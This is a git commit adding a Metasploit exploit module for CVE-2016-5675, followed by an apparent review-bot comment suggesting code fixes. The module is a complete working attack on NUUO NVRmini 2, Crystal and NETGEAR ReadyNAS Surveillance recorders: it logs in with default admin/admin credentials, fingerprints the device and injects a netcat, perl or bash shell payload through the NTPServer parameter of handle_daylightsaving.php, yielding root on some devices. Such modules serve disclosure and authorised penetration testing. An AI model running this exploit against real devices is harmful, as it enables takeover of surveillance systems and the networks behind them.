
Commit 0deac80

author
Pedro Ribeiro
committed
add exploit for CVE 2016-5675
1 parent cf95c9f commit 0deac80


1 file changed

+178
-0
lines changed

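--- /dev/null
+++ b/PATH_UNKNOWN
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# - test v_web_login_login_type string in NVRmini
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
+'Description' => %q{
+The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
+to an authenticated remote code execution on the exposed web administration interface. An administrative
+account is needed to exploit this vulnerability.
+This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
+This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
+It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
+in those devices.
+},
+'Author' =>
+[
+'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2016-5675'],
+['US-CERT-VU', '856152'],
+['URL', 'TODO_GITHUB_URL'],
+['URL', 'TODO_FULLDISC_URL']
+],
+'DefaultOptions' => { 'WfsDelay' => 5 },
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Privileged' => false, # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
+'Targets' =>
+[
+[ 'Automatic', { } ],
+[ 'NUUO NVRmini 2', {
+'Payload' =>
+{
+'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
+'DisableNops' => true,
+'Compat' =>
+{
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'netcat generic perl'
+}
+},
+}],
+[ 'ReadyNAS NETGEAR Surveillance', {
+'Payload' =>
+{
+'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
+'DisableNops' => true,
+'Compat' =>
+{
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'netcat generic perl'
+}
+},
+}],
+[ 'NUUO Crystal', {
+'Payload' =>
+{
+'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
+'DisableNops' => true,
+'Compat' =>
+{
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'bash'
+}
+},
+}],
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Aug 4 2016'))
+
+register_options(
+[
+Opt::RPORT(8081),
+OptString.new('TARGETURI', [true, "Application path", '/']),
+OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
+OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
+], self.class)
+end
+
+
+def id_target
+return target if target.name != 'Automatic'
+res = send_request_cgi({
+'uri' => normalize_uri(datastore['TARGETURI'])
+})
+if res && res.code == 200
+if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
+print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
+return targets[2]
+elsif res.body.to_s =~ /v_web_login_login_type/
+print_status("#{peer} - Identified NUUO Crystal as the target.")
+return targets[3]
+else
+print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
+return targets[1]
+end
+end
+end
+
+
+def exploit
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
+'vars_post' => {
+'user' => datastore['USERNAME'],
+'pass' => datastore['PASSWORD'],
+'submit' => "Login"
+}
+})
+
+if res && (res.code == 200 || res.code == 302)
+cookie = res.get_cookies
+else
+fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
+end
+
+my_target = id_target
+if my_target == targets[1]
+if payload.raw.include?("perl")
+fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
+end
+print_status("#{peer} - Executing payload...")
+send_request_cgi({
+'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+'cookie' => cookie,
+'vars_get' => {
+'act' => "update",
+'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
+}
+}, 1)
+elsif my_target == targets[2]
+if payload.raw.include?("netcat")
+fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
+end
+# We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
+# it up.
+print_status("#{peer} - Executing payload...")
+send_request_cgi({
+'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+'cookie' => cookie,
+'vars_get' => {
+'act' => "update",
+'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
+}
+}, 1)
+else
+if not payload.raw.include?("exec")
+fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
+end
+print_status("#{peer} - Executing payload...")
+send_request_cgi({
+'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+'cookie' => cookie,
+'vars_get' => {
+'act' => "update",
+'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
+}
+}, 1)
+end
+handler
+end
+end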
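Review bot: id_target returns nil whenever the fingerprint request gets no response or a non-200 status, and in exploit that nil matches neither `targets[1]` nor `targets[2]`, so an unidentified device silently falls into the `else` (NUUO Crystal) branch; add `fail_with(Failure::UnexpectedReply, "#{peer} - Could not identify the target.")` after the `if res && res.code == 200` block in id_target so the module stops with a clear message instead. The login check accepting any 200 presumably also accepts a 200 error page from login.php, so `cookie` may be empty when the credentials are wrong and the later requests fail with a misleading error — worth confirming against the device's actual login response. Smaller points: `if not payload.raw.include?("exec")` reads better as `unless payload.raw.include?("exec")`, the login and payload-compat failures are more precisely `Failure::NoAccess` and `Failure::BadConfig` than `Failure::Unknown`, and the `TODO_GITHUB_URL` / `TODO_FULLDISC_URL` references plus the `# - test v_web_login_login_type string in NVRmini` note at the top are unresolved placeholders that should be filled in or dropped before merge.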
